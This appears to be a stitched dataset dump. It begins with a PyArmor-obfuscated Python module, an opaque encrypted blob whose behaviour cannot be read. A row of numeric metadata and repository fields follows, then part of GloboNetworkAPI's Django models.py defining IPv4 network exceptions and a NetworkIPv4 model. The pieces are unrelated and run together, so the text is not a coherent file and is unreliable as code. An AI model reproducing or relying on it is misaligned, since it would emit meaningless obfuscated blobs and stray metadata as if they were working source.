__pyarmor__(__name__, __file__, b'\x50\x59\x41\x52\x4d\x4f\x52\x00\x00\x03\x09\x00\x61\x0d\x0d\x0a\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\xbd\x03\x00\x00\x00\x00\x00\x18\xff\x1d\x5e\x60\x11\x72\x24\x96\x8f\x34\x92\x52\xda\xab\x44\x2e\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x9f\x68\xc2\x05\x01\x9f\x33\x2b\xee\xc4\x4f\x80\xe4\x93\xbc\xfb\x69\xe0\x42\x5f\x9f\x64\x66\x13\x8f\xd3\xfd\xac\xc4\xa2\x28\x19\x87\xcd\x19\xef\xeb\x10\x02\x5c\x20\x5f\x40\x1f\xee\x74\xcf\x87\x02\x58\xc2\xbb\x34\x58\xb2\x8d\x9f\x63\x76\x49\xef\x05\x6f\x68\x3d\x68\xb5\x87\x69\xe5\x14\xeb\xd0\xaa\x6e\x17\x93\x42\xa5\xde\x45\x62\x18\x6d\x7f\xe6\xdc\x5a\x1d\xd3\xf0\x1d\x07\x25\x41\xfa\x41\x0a\x7c\x51\x14\x0e\xb4\x35\xdd\x19\xfc\x8a\xf3\xef\xff\x28\xa0\x71\x01\x0a\xe1\xf8\x11\x1e\xdc\x97\xdc\x5e\x8e\x0f\x47\x06\x7e\x15\x4a\xa4\x1b\xd4\xa0\x8e\x10\xec\x0d\x77\x36\xea\x93\xe8\xad\x11\xcd\x5d\xcf\x9d\xc1\x6f\x7a\xdf\xba\x7d\xba\x1d\xe9\x21\xa0\xac\xc4\x73\x64\x39\xec\x84\xa5\x5a\x58\xb1\xcd\x93\x18\x10\x9b\x0d\x8d\xc2\x70\x17\x80\xb6\xab\x35\x39\xb8\xe9\x72\x70\xea\x15\x7a\x88\x56\x96\xb3\xaa\x3d\xf5\x56\xd0\x6a\x80\xdd\x2c\x14\x29\x0f\x99\x5c\x53\xfa\xc2\x05\x0a\x9d\xd1\x9a\x21\xab\x28\xae\x80\x89\xbc\x68\xce\x0c\x66\x5d\xa7\x44\xc6\x0b\xb2\x58\x0c\xb7\x39\x60\x40\xd1\x66\x15\xb4\xb1\xf5\x46\x59\xe8\x85\xa4\x9f\x1d\xc1\xe4\xd3\x6e\x17\x12\x50\xa5\xed\xe7\xa5\x33\x7f\x76\x90\x8a\xe5\xe5\xe5\x99\xda\x6d\xf3\xba\xf1\x32\x0a\x8b\xe8\x55\xba\x81\x04\x0e\x69\x1e\x3c\x45\xe4\x2d\x2f\xc1\xd6\x00\x93\xae\x6e\x76\x32\x58\x34\x5c\x61\x1b\xbd\x95\xc8\x8e\x81\x69\x4c\x99\xce\x0d\x7d\x92\xf4\x09\x6c\x1f\x3f\xc7\x92\xa7\xdc\xbf\x8f\xa0\xea\xe6\xe8\xe8\xea\x95\x63\x32\x0d\xbe\xbc\xff\xdc\xbf\x0b\x61\xb8\xc8\xbe\x02\x7b\x17\x57\xf0\x31\xf6\x78\xf1\xcc\xf4\x66\xad\xc1\xe5\xf7\x1e\x8f\xaf\xbc\xfa\x84\x6a\x7f\xd7\xa9\x8b\x5a\x3c\x83\xf6\xfc\x95\xf9\xe4\xef\x8d\x52\x30\x3e\x0d\x5b\x95\x32\xc4\x82\x68\x2f\x95\x06\xb9\xa9\x3f\xb3\x7d\x35\x5e\xc4\x0a\x93\xbd\x3b\x6d\x19\xd0\xc9\x4e\x78\x24\xb9\x02\xcb\xfc\xd6\xc5\x32\x4a\x60\xe2\x20\x89\xf7\xc7\xc0\xb5\x5d\x6f\xcf\x92\x4e\x30\x73\x8b\x0a\x30\x19\x6a\xa8\xea\x84\x4f\x7a\xaa\x13\xe7\xb5\x26\xcd\x8b\x34\x2a\x2f\xf6\xde\xf2\xfb\xa8\x31\xbb\x88\x4c\x54\x63\x9b\x8b\x03\x32\xec\xf5\xa7\x28\x7d\xe4\xa7\x3f\xfa\xda\xe1\x54\x55\x77\xd0\x43\x2d\x5e\x58\x0d\xd5\x09\xcc\xfe\x28\x62\xc3\x22\xd3\xf8\x14\x24\x42\x34\x27\x58\xda\xca\xef\x35\xb4\x58\xbf\xa6\x87\xbe\x90\x42\xe4\x96\x13\x8d\x01\x09\x7d\xd1\x61\x29\xfc\xad\xf6\x87\x99\x24\x30\xe0\xbb\xea\x4d\xee\x2c\x93\x53\x12\xbd\xa4\xe5\xe0\x87\xdf\xf7\x64\xcf\x0f\x86\x69\x7c\x86\x58\x3c\xc2\xa5\x42\x5f\xea\x23\x9c\x93\x3f\x5e\xad\xc2\x78\x39\x4a\xc9\x8f\x08\x41\x4a\x1e\x45\xcf\xd0\xd8\x49\x32\xa7\x67\x65\xe8\xe7\x9d\x57\x5c\x86\xd2\x52\x19\x3c\xdc\x34\x54\xe3\xec\xd4\x1c\xb2\x52\xa6\xf3\x4b\x2a\x09\x58\xfd\xfa\x36\xda\xcb\xc5\xe2\x70\xdb\xd3\xa3\x56\xd6\x5d\x37\xab\x38\x10\xdd\x53\x92\xf5\xd8\x7b\x22\x10\x01\x10\x73\x1d\xac\x99\x5a\x74\xe7\x94\x3d\xac\x12\xe9\xee\x8c\xfd\xdb\xad\x53\xbf\x98\xbe\x66\x42\x86\x05\xa4\xe9\xe0\x3b\xc6\x2f\x17\x77\x56\x28\x93\x49\xe0\x31\x4d\x0e\x85\xe6\x57\xae\x1b\x47\x09\x2e\x98\x8b\x61\xb1\x09\x64\x2f\x59\x38\xa8\xc1\x04\xcc\xa7\x7e\x8f\xe8\x8b\x56\x1d\xc5\xb5\xd4\x4b\x81\xb4\x5d\x7f\x7a\xb5\x03\x8e\x39\x27\x57\x2c\x09\xa6\x81\x12\xfb\xb8\xb2\xbf\x6b\xec\x73\xc0\xa2\x39\xbd\x6b\xf0\x24\x91\xa1\x6b\xb7\x75\x51\x28\xb6\xe1\xbe\x9a\x7e\x51\x54\x69\xc1\x6f\x5f\x3d\x0f\xfb\xaf\x0e\xa7\xa7\xa2\xff\x2c\x9b\xa9\x60\xee\x57\xeb\x4e\xfb\xa7\x2f\x0b\x0a\x47\x90\x24\x76\x01\xec\xac\x88\x01\xbb\xdf\x28\x4b\x3d\xea\x4a\xd6\xdd\x2a\xae\x6f\xdb\x2b\xc3\x36\xfb\xfb\x00\xda\xe3\xe2\x1e\xb3\x1b\xc8\x11\x05\x38\x31\x9f\xa9\x23\x4b\x02\x10\x3b\x03\xc9\xd4\x54\x32\xd3\x67\xc3\x3c\x09\x82\xba\x7a\x2c\x5f\x37\x38\x9e\x9d\x6e\x4e\x15\xbf\x12\x62\xcd\x20\xd5\x52\xab\xa5\x38\x0e\x36\x22\xb3\x5d\xe2\x8b\x73\x4e\xde\xf9\xd3\x6c\x0a\x6c\xef\x93\x40\x60\xab\x55\xff\x3d\xbe\x2b\x2f\xb3\x07\x9c\x07\xfc\xd2\xb0\xa4\x1a\xa4\x85\xfa\x80\xe9\xea\x4d\x16\x94\x27\xa5\xf3\x72\xb0\xc9\x75\xdc\x79\xc1\xdf\x95\x6b\xaa\xdb\xd6\x09\x37\xc0\xf0\x66\xd1\x61\x05\x4f\x86\xd7\x0f\x1e\xe6\x01\x61\x66\x73\x5f\x60\xad\xda', 2) | 1,393.666667 | 4,123 | 0.751734 | 1,033 | 4,181 | 3.029042 | 0.25363 | 0.042186 | 0.046021 | 0.042186 | 0.019175 | 0.014382 | 0.014382 | 0 | 0 | 0 | 0 | 0.304817 | 0.001913 | 4,181 | 3 | 4,123 | 1,393.666667 | 0.445004 | 0 | 0 | 0 | 0 | 0.333333 | 0.976566 | 0.976566 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 11 |
9060bcd3a1cfb7aaa95ee9fc8ca42881a4c38c13 | 159,114 | py | Python | networkapi/ip/models.py | brunodevel/GloboNetworkAPI | ea8eebc0337636f9250e628cc392514934db8edd | [
"Apache-2.0"
] | null | null | null | networkapi/ip/models.py | brunodevel/GloboNetworkAPI | ea8eebc0337636f9250e628cc392514934db8edd | [
"Apache-2.0"
] | null | null | null | networkapi/ip/models.py | brunodevel/GloboNetworkAPI | ea8eebc0337636f9250e628cc392514934db8edd | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from _mysql_exceptions import OperationalError
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
from django.db import transaction
from django.db.models import get_model
from networkapi.ambiente.models import ConfigEnvironmentInvalidError
from networkapi.ambiente.models import IP_VERSION
from networkapi.api_vip_request import syncs
from networkapi.distributedlock import distributedlock
from networkapi.distributedlock import LOCK_ENVIRONMENT
from networkapi.distributedlock import LOCK_VIP
from networkapi.equipamento.models import EquipamentoAmbienteDuplicatedError
from networkapi.equipamento.models import EquipamentoAmbienteNotFoundError
from networkapi.equipamento.models import EquipamentoError
from networkapi.exception import InvalidValueError
from networkapi.infrastructure.ipaddr import AddressValueError
from networkapi.infrastructure.ipaddr import IPNetwork
from networkapi.infrastructure.ipaddr import IPv4Address
from networkapi.infrastructure.ipaddr import IPv4Network
from networkapi.infrastructure.ipaddr import IPv6Address
from networkapi.infrastructure.ipaddr import IPv6Network
from networkapi.models.BaseModel import BaseModel
from networkapi.queue_tools import queue_keys
from networkapi.queue_tools.queue_manager import QueueManager
from networkapi.util import mount_ipv4_string
from networkapi.util import mount_ipv6_string
from networkapi.util.decorators import cached_property
from networkapi.util.geral import get_app
Equipamento = get_model('equipamento', 'Equipamento')
EquipamentoAmbiente = get_model('equipamento', 'EquipamentoAmbiente')
TipoEquipamento = get_model('equipamento', 'TipoEquipamento')
Ambiente = get_model('ambiente', 'Ambiente')
ConfigEnvironment = get_model('ambiente', 'ConfigEnvironment')
EnvironmentVip = get_model('ambiente', 'EnvironmentVip')
# TipoRede = get_model('vlan', 'TipoRede')
Vlan = get_model('vlan', 'Vlan')
FilterEquipType = get_model('filterequiptype', 'FilterEquipType')
Configuration = get_model('config', 'Configuration')
class NetworkIPv4Error(Exception):
"""Generic exception for everything related to NetworkIPv4."""
def __init__(self, cause, message=None):
self.cause = cause
self.message = message
def __str__(self):
msg = u'Caused by: %s, Message: %s' % (self.cause, self.message)
return msg.encode('utf-8', 'replace')
class NetworkIPv6Error(Exception):
"""Generic exception for everything related to NetworkIPv6."""
def __init__(self, cause, message=None):
self.cause = cause
self.message = message
def __str__(self):
msg = u'Caused by: %s, Message: %s' % (self.cause, self.message)
return msg.encode('utf-8', 'replace')
class NetworkIPvXError(Exception):
"""Generic exception for everything related to both NetworkIPv4 and NetworkIPv6."""
def __init__(self, cause, message=None):
self.cause = cause
self.message = message
def __str__(self):
msg = u'Caused by: %s, Message: %s' % (self.cause, self.message)
return msg.encode('utf-8', 'replace')
class NetworkIPRangeEnvError(NetworkIPvXError):
"""Exception for two environments with same ip range when trying to add new network."""
def __init__(self, cause, message=None):
self.cause = cause
self.message = message
def __str__(self):
msg = u'Caused by: %s, Message: %s' % (self.cause, self.message)
return msg.encode('utf-8', 'replace')
class IpError(Exception):
"""Representa um erro ocorrido durante acesso à tabelas relacionadas com IP."""
def __init__(self, cause, message=None):
self.cause = cause
self.message = message
def __str__(self):
msg = u'Causa: %s, Mensagem: %s' % (self.cause, self.message)
return msg.encode('utf-8', 'replace')
class NetworkIPv4NotFoundError(NetworkIPv4Error):
"""Exception to search by primary key."""
def __init__(self, cause, message=None):
NetworkIPv4Error.__init__(self, cause, message)
class NetworkIPv6NotFoundError(NetworkIPv6Error):
"""Exception to search by primary key."""
def __init__(self, cause, message=None):
NetworkIPv6Error.__init__(self, cause, message)
class NetworkIPvXNotFoundError(NetworkIPvXError):
"""Exception to search by primary key."""
def __init__(self, cause, message=None):
NetworkIPvXError.__init__(self, cause, message)
class NetworkIPv4AddressNotAvailableError(NetworkIPv4Error):
"""Exception to unavailable address to create a new NetworkIPv4."""
def __init__(self, cause, message=None):
NetworkIPv4Error.__init__(self, cause, message)
class NetworkIPv6AddressNotAvailableError(NetworkIPv6Error):
"""Exception to unavailable address to create a new NetworkIPv6."""
def __init__(self, cause, message=None):
NetworkIPv6Error.__init__(self, cause, message)
class NetworkIpAddressNotAvailableError(NetworkIPvXError):
"""Exception to unavailable address."""
def __init__(self, cause, message=None):
NetworkIPvXError.__init__(self, cause, message)
class IpNotFoundError(IpError):
"""Retorna exceção para pesquisa de IP por chave primária."""
def __init__(self, cause, message=None):
IpError.__init__(self, cause, message)
class IpEquipmentNotFoundError(IpError):
"""Retorna exceção para pesquisa de IP-Equipamento por chave primária/ip e equipamento."""
def __init__(self, cause, message=None):
IpError.__init__(self, cause, message)
class IpEquipamentoDuplicatedError(IpError):
"""Retorna exceção para pesquisa de IP-Equipamento duplicado."""
def __init__(self, cause, message=None):
IpError.__init__(self, cause, message)
class IpNotAvailableError(IpError):
"""Retorna exceção porque não existe um IP disponível para a VLAN."""
def __init__(self, cause, message=None):
IpError.__init__(self, cause, message)
class IpEquipmentAlreadyAssociation(IpError):
"""Retorna exceção caso um Ip já esteja associado a um determinado equipamento."""
def __init__(self, cause, message=None):
IpError.__init__(self, cause, message)
class IpNotFoundByEquipAndVipError(IpError):
"""Retorna exceção caso um Ip já esteja associado a um determinado equipamento."""
def __init__(self, cause, message=None):
IpError.__init__(self, cause, message)
class IpCantBeRemovedFromVip(IpError):
"""Retorna exceção caso um Ip não possa ser excluído por estar em uso por uma requisição VIP."""
def __init__(self, cause, message=None):
IpError.__init__(self, cause, message)
class NetworkNotInEvip(IpError):
"""Retorna exceção caso não haja uma rede Ipv4 ou Ipv6 para o Ambiente Vip."""
def __init__(self, cause, message=None):
IpError.__init__(self, cause, message)
class IpRangeAlreadyAssociation(IpError):
"""Returns exception for equipment already having ip with same ip range in another network."""
def __init__(self, cause, message=None):
IpError.__init__(self, cause, message)
class IpEquipCantDissociateFromVip(IpError):
"""Returns exception when trying to dissociate ip and equipment, but equipment is the last balancer for Vip Request"""
def __init__(self, cause, message=None):
IpError.__init__(self, cause, message)
class IpCantRemoveFromServerPool(IpError):
"""Returns exception when trying to dissociate ip and equipment, but equipment is the last balancer for Vip Request"""
def __init__(self, cause, message=None):
IpError.__init__(self, cause, message)
class NetworkIPv4(BaseModel):
id = models.AutoField(
primary_key=True
)
oct1 = models.IntegerField(
db_column='rede_oct1'
)
oct2 = models.IntegerField(
db_column='rede_oct2'
)
oct3 = models.IntegerField(
db_column='rede_oct3'
)
oct4 = models.IntegerField(
db_column='rede_oct4'
)
block = models.IntegerField(
db_column='bloco'
)
mask_oct1 = models.IntegerField(
db_column='masc_oct1'
)
mask_oct2 = models.IntegerField(
db_column='masc_oct2'
)
mask_oct3 = models.IntegerField(
db_column='masc_oct3'
)
mask_oct4 = models.IntegerField(
db_column='masc_oct4'
)
broadcast = models.CharField(
max_length=15,
blank=False
)
vlan = models.ForeignKey(
'vlan.Vlan',
db_column='id_vlan'
)
network_type = models.ForeignKey(
'vlan.TipoRede',
null=True,
db_column='id_tipo_rede'
)
ambient_vip = models.ForeignKey(
'ambiente.EnvironmentVip',
null=True,
db_column='id_ambientevip'
)
cluster_unit = models.CharField(
max_length=45,
db_column='cluster_unit'
)
active = models.BooleanField()
log = logging.getLogger('NetworkIPv4')
class Meta(BaseModel.Meta):
db_table = u'redeipv4'
managed = True
def _get_networkv4(self):
"""Returns formated ip."""
return '%s/%s' % (self.formated_octs, self.block)
networkv4 = property(_get_networkv4)
def _get_formated_octs(self):
"""Returns formated octs."""
return '%s.%s.%s.%s' % (self.oct1, self.oct2, self.oct3, self.oct4)
formated_octs = property(_get_formated_octs)
def _get_mask_formated(self):
"""Returns formated mask."""
return '%s.%s.%s.%s' % (self.mask_oct1, self.mask_oct2,
self.mask_oct3, self.mask_oct4)
mask_formated = property(_get_mask_formated)
def _get_wildcard(self):
return '%d.%d.%d.%d' % (255 - self.mask_oct1,
255 - self.mask_oct2,
255 - self.mask_oct3,
255 - self.mask_oct4)
wildcard = property(_get_wildcard)
def _get_dhcprelay(self):
dhcprelay = self.dhcprelayipv4_set.all()
return dhcprelay
dhcprelay = property(_get_dhcprelay)
@classmethod
def get_by_pk(cls, id):
"""Get NetworkIPv4 by id.
@return: NetworkIPv4.
@raise NetworkIPv4NotFoundError: NetworkIPv4 is not registered.
@raise NetworkIPv4Error: Failed to search for the NetworkIPv4.
@raise OperationalError: Lock wait timeout exceeded.
"""
try:
return NetworkIPv4.objects.filter(id=id).uniqueResult()
except ObjectDoesNotExist, e:
raise NetworkIPv4NotFoundError(
e, u'There is no NetworkIPv4 with pk = %s.' % id)
except OperationalError, e:
cls.log.error(u'Lock wait timeout exceeded.')
raise OperationalError(
e, u'Lock wait timeout exceeded; try restarting transaction')
except Exception, e:
cls.log.error(u'Failure to search the NetworkIPv4.')
raise NetworkIPv4Error(e, u'Failure to search the NetworkIPv4.')
def activate(self, authenticated_user):
try:
self.active = 1
self.save()
net_slz = get_app('api_network', 'serializers.v3')
serializer = net_slz.NetworkIPv4V3Serializer(
self,
include=('vlan__details__environment__basic',))
data_to_queue = serializer.data
data_to_queue.update({
'description': queue_keys.NETWORKv4_ACTIVATE
})
# Send to Queue
queue_manager = QueueManager()
queue_manager.append({
'action': queue_keys.NETWORKv4_ACTIVATE,
'kind': queue_keys.NETWORKv4_KEY,
'data': data_to_queue
})
queue_manager.send()
except Exception, e:
self.log.error(u'Error activating NetworkIPv4.')
raise NetworkIPv4Error(e, u'Error activating NetworkIPv4.')
def deactivate(self, authenticated_user, commit=False):
"""
Update status column to 'active = 0'
@param authenticated_user: User authenticate
@raise NetworkIPv4Error: Error disabling a NetworkIPv4.
"""
from networkapi.api_network.serializers.v1 import NetworkIPv4Serializer
try:
self.active = 0
# Send to Queue
queue_manager = QueueManager()
serializer = NetworkIPv4Serializer(self)
data_to_queue = serializer.data
data_to_queue.update(
{'description': queue_keys.NETWORKv4_DEACTIVATE})
queue_manager.append({'action': queue_keys.NETWORKv4_DEACTIVATE,
'kind': queue_keys.NETWORKv4_KEY, 'data': data_to_queue})
queue_manager.send()
self.save(authenticated_user, commit=commit)
except Exception, e:
self.log.error(u'Error disabling NetworkIPv4.')
raise NetworkIPv4Error(e, u'Error disabling NetworkIPv4.')
def edit_network_ipv4(self, authenticated_user, id_net_type, id_env_vip, cluster_unit):
try:
self.network_type = id_net_type
self.ambient_vip = id_env_vip
self.cluster_unit = cluster_unit
self.save()
except Exception, e:
self.log.error(u'Error on update NetworkIPv4.')
raise NetworkIPv4Error(e, u'Error on update NetworkIPv4.')
def add_network_ipv4(self, user, id_vlan, network_type, evip, prefix=None):
"""Allocate and Insert new NetworkIPv4 in database
@return: Vlan map
@raise VlanNotFoundError: Vlan is not registered.
@raise VlanError: Failed to search for the Vlan
@raise ConfigEnvironmentInvalidError: Invalid Environment Configuration or not registered
@raise NetworkIPv4Error: Error persisting a NetworkIPv4.
@raise NetworkIPv4AddressNotAvailableError: Unavailable address to create a NetworkIPv4.
@raise Invalid: Unavailable address to create a NetworkIPv4.
@raise InvalidValueError: Network type does not exist.
"""
self.vlan = Vlan().get_by_pk(id_vlan)
network_found = None
stop = False
internal_network_type = None
type_ipv4 = IP_VERSION.IPv4[0]
try:
# Find all configs type v4 in environment
configs = ConfigEnvironment.get_by_environment(
self.vlan.ambiente.id).filter(ip_config__type=IP_VERSION.IPv4[0])
# If not found, an exception is thrown
if len(configs) == 0:
raise ConfigEnvironmentInvalidError(
None, u'Invalid Configuration')
# Needs to lock IPv4 listing when there are any allocation in progress
# If not, it will allocate two networks with same range
with distributedlock(LOCK_ENVIRONMENT % self.vlan.ambiente.id):
# Find all networks ralated to environment
nets = NetworkIPv4.objects.filter(
vlan__ambiente__id=self.vlan.ambiente.id)
# Cast to API class
networksv4 = set([(IPv4Network(
'%d.%d.%d.%d/%d' % (net_ip.oct1, net_ip.oct2, net_ip.oct3, net_ip.oct4, net_ip.block))) for net_ip in nets])
# For each configuration founded in environment
for config in configs:
# If already get a network stop this
if stop:
break
# Need to be IPv4
if config.ip_config.type == IP_VERSION.IPv4[0]:
net4 = IPv4Network(config.ip_config.subnet)
if prefix is not None:
new_prefix = int(prefix)
else:
new_prefix = int(config.ip_config.new_prefix)
self.log.info(
u'Prefix that will be used: %s' % new_prefix)
# For each subnet generated with configs
for subnet in net4.iter_subnets(new_prefix=new_prefix):
net_found = True
for network in networksv4:
if subnet in network:
net_found = False
# Checks if the network generated is UNUSED
if net_found:
# Checks if it is subnet/supernet of any
# existing network
in_range = network_in_range(
self.vlan, subnet, type_ipv4)
if not in_range:
continue
# If not this will be USED
network_found = subnet
if network_type:
internal_network_type = network_type
elif config.ip_config.network_type is not None:
internal_network_type = config.ip_config.network_type
else:
self.log.error(
u'Parameter tipo_rede is invalid. Value: %s', network_type)
raise InvalidValueError(
None, 'network_type', network_type)
# Stop generation logic
stop = True
break
# If not IPv4
else:
# Throw an exception
raise ConfigEnvironmentInvalidError(
None, u'Invalid Configuration')
# Checks if found any available network
if network_found is None:
# If not found, an exception is thrown
raise NetworkIPv4AddressNotAvailableError(
None, u'Unavailable address to create a NetworkIPv4.')
# Set octs by network generated
self.oct1, self.oct2, self.oct3, self.oct4 = str(
network_found.network).split('.')
# Set block by network generated
self.block = network_found.prefixlen
# Set mask by network generated
self.mask_oct1, self.mask_oct2, self.mask_oct3, self.mask_oct4 = str(
network_found.netmask).split('.')
# Set broadcast by network generated
self.broadcast = network_found.broadcast
try:
self.network_type = internal_network_type
self.ambient_vip = evip
self.save()
transaction.commit()
except Exception, e:
self.log.error(u'Error persisting a NetworkIPv4.')
raise NetworkIPv4Error(
e, u'Error persisting a NetworkIPv4.')
except (ValueError, TypeError, AddressValueError), e:
raise ConfigEnvironmentInvalidError(e, u'Invalid Configuration')
# Return vlan map
vlan_map = dict()
vlan_map['id'] = self.vlan.id
vlan_map['nome'] = self.vlan.nome
vlan_map['num_vlan'] = self.vlan.num_vlan
vlan_map['id_tipo_rede'] = self.network_type.id
vlan_map['id_ambiente'] = self.vlan.ambiente.id
vlan_map['rede_oct1'] = self.oct1
vlan_map['rede_oct2'] = self.oct2
vlan_map['rede_oct3'] = self.oct3
vlan_map['rede_oct4'] = self.oct4
vlan_map['bloco'] = self.block
vlan_map['mascara_oct1'] = self.mask_oct1
vlan_map['mascara_oct2'] = self.mask_oct2
vlan_map['mascara_oct3'] = self.mask_oct3
vlan_map['mascara_oct4'] = self.mask_oct4
vlan_map['broadcast'] = self.broadcast
vlan_map['descricao'] = self.vlan.descricao
vlan_map['acl_file_name'] = self.vlan.acl_file_name
vlan_map['acl_valida'] = self.vlan.acl_valida
vlan_map['acl_file_name_v6'] = self.vlan.acl_file_name_v6
vlan_map['acl_valida_v6'] = self.vlan.acl_valida_v6
vlan_map['ativada'] = self.vlan.ativada
vlan_map['id_network'] = self.id
map = dict()
map['vlan'] = vlan_map
return map
def delete(self):
try:
for ip in self.ip_set.all():
ip.delete()
super(NetworkIPv4, self).delete()
except IpCantBeRemovedFromVip, e:
# Network id and ReqVip id
net_name = str(self.oct1) + '.' + str(self.oct2) + '.' + \
str(self.oct3) + '.' + str(self.oct4) + '/' + str(self.block)
cause = {'Net': net_name, 'ReqVip': e.cause}
raise IpCantBeRemovedFromVip(
cause, 'Esta Rede possui um Vip apontando para ela, e não pode ser excluída')
def create_v3(self, networkv4):
"""
Create new networkIPv4.
"""
self.oct1 = networkv4.get('oct1')
self.oct2 = networkv4.get('oct2')
self.oct3 = networkv4.get('oct3')
self.oct4 = networkv4.get('oct4')
self.block = networkv4.get('prefix')
self.mask_oct1 = networkv4.get('mask_oct1')
self.mask_oct2 = networkv4.get('mask_oct2')
self.mask_oct3 = networkv4.get('mask_oct3')
self.mask_oct4 = networkv4.get('mask_oct4')
self.cluster_unit = networkv4.get('cluster_unit')
validate_network = True
if self.oct1 is None and self.oct2 is None and self.oct3 is None and self.oct4 is None:
self.allocate_network(networkv4.get(
'vlan'), networkv4.get('prefix'))
validate_network = False
elif self.block is not None and self.oct1 is not None and self.oct2 is not None and self.oct3 is not None and self.oct4 is not None:
ip = IPNetwork('%s/%s' % (self.formated_octs, self.block))
self.broadcast = ip.broadcast.compressed
mask = ip.netmask.exploded.split('.')
self.mask_oct1 = mask[0]
self.mask_oct2 = mask[1]
self.mask_oct3 = mask[2]
self.mask_oct4 = mask[3]
elif self.mask_oct1 is not None and self.mask_oct2 is not None and self.mask_oct3 is not None and self.mask_oct4 is not None:
ip = IPNetwork('%s/%s' % (self.formated_octs, self.mask_formated))
self.block = ip.prefixlen
else:
raise Exception('Is need to send block ou mask.')
vlan_model = get_model('vlan', 'Vlan')
self.vlan = vlan_model().get_by_pk(networkv4.get('vlan'))
tiporede_model = get_model('vlan', 'TipoRede')
self.network_type = tiporede_model().get_by_pk(networkv4.get('network_type'))
# has environmentvip
if networkv4.get('environmentvip'):
environmentvip_model = get_model('ambiente', 'EnvironmentVip')
self.environmentvip = environmentvip_model().get_by_pk(
networkv4.get('environmentvip'))
self.validate_v3()
if validate_network:
self.validate_network()
self.save()
def update_v3(self, networkv4):
"""
Update new networkIPv4.
"""
self.cluster_unit = networkv4.get('cluster_unit')
# vlan_model = get_model('vlan', 'Vlan')
tiporede_model = get_model('vlan', 'TipoRede')
# self.vlan = vlan_model().get_by_pk(networkv4.get('vlan'))
self.network_type = tiporede_model().get_by_pk(networkv4.get('network_type'))
# has environmentvip
if networkv4.get('environmentvip'):
environmentvip_model = get_model('ambiente', 'EnvironmentVip')
self.environmentvip = environmentvip_model().get_by_pk(
networkv4.get('environmentvip'))
self.validate_v3()
self.save()
def delete_v3(self):
"""
Method V3 to remove NetworkIPv4.
Before removing the NetworkIPv4 removes all your Ipv4
@raise IpCantBeRemovedFromVip: Ip is associated with created
Vip Request.
"""
try:
for ip in self.ip_set.all():
ip.delete_v3()
super(NetworkIPv4, self).delete()
except IpCantBeRemovedFromVip, e:
# Network id and Vip Request id
raise Exception(
'This network has a VIP pointing to it, and can not be deleted. '
'Network:%s, Vip Request: %s' % (self.mask_formated, e.cause))
def validate_v3(self):
"""
Validate networkIPv4.
"""
# validate if network if allow in environment
configs = self.vlan.ambiente.configs.all()
self.vlan.allow_networks_environment(configs, [self], [])
def validate_network(self):
"""
Verify if network make conflict in environment or environment related.
"""
envs = self.vlan.get_environment_related()
net_ip = [IPNetwork(self.networkv4)]
# Filter network_ipv4 where environment has config permiting to insert
# current network.
nets_envs = list()
for env in envs:
# get configs v4 of environment
nts = [IPNetwork(config.ip_config.subnet)
for config in env.configs.filter(
ip_config__type=IP_VERSION.IPv4[0])]
# get networks that can be intersect with current network
if self.vlan.verify_intersect(nts, net_ip)[0]:
self.log.info('Environment %s has config(%s) permiting to insert '
'in this network %s' % (env.name, nts, net_ip))
for vlan in env.vlans:
for network_ipv4 in vlan.networks_ipv4:
nets_envs.append(IPNetwork(network_ipv4.networkv4))
if nets_envs:
subnet, supernet = self.vlan.verify_intersect(nets_envs, net_ip)
if subnet or supernet:
raise Exception(
'One of the equipment associated with the environment '
'of this Vlan is also associated with other environment '
'that has a network with the same track, add filters in '
'environments if necessary. Your Network: %s, Network'
'already created: %s' % (subnet, supernet))
subnet, supernet = self.vlan.verify_intersect(net_ip, nets_envs)
if subnet or supernet:
raise Exception(
'One of the equipment associated with the environment '
'of this Vlan is also associated with other environment '
'that has a network with the same track, add filters in '
'environments if necessary. Your Network: %s, Network'
'already created: %s' % (supernet, subnet))
def activate_v3(self):
"""
Send activate notication of network v4 for queue of ACL
configuration system.
Update status column to 'active = 1'.
@raise NetworkIPv4Error: Error activating a NetworkIPv4.
"""
try:
self.active = 1
self.save()
net_slz = get_app('api_network', 'serializers.v3')
serializer = net_slz.NetworkIPv4V3Serializer(
self,
include=('vlan__details__environment__basic',))
data_to_queue = serializer.data
data_to_queue.update({
'description': queue_keys.NETWORKv4_ACTIVATE
})
# Send to Queue
queue_manager = QueueManager()
queue_manager.append({
'action': queue_keys.NETWORKv4_ACTIVATE,
'kind': queue_keys.NETWORKv4_KEY,
'data': data_to_queue
})
queue_manager.send()
except Exception, e:
self.log.error(u'Error activating NetworkIPv4.')
raise NetworkIPv4Error(e, u'Error activating NetworkIPv4.')
def deactivate_v3(self):
"""
Send deactivate notication of network v4 for queue of ACL
configuration system.
Update status column to 'active = 0'.
@raise NetworkIPv4Error: Error disabling a NetworkIPv4.
"""
try:
net_slz = get_app('api_network', 'serializers.v3')
self.active = 0
serializer = net_slz.NetworkIPv4V3Serializer(
self,
include=('vlan__details__environment__basic',))
data_to_queue = serializer.data
data_to_queue.update({
'description': queue_keys.NETWORKv4_DEACTIVATE
})
# Send to Queue
queue_manager = QueueManager()
queue_manager.append({
'action': queue_keys.NETWORKv4_DEACTIVATE,
'kind': queue_keys.NETWORKv4_KEY,
'data': data_to_queue
})
queue_manager.send()
self.save()
except Exception, e:
self.log.error(u'Error disabling NetworkIPv4.')
raise NetworkIPv4Error(e, u'Error disabling NetworkIPv4.')
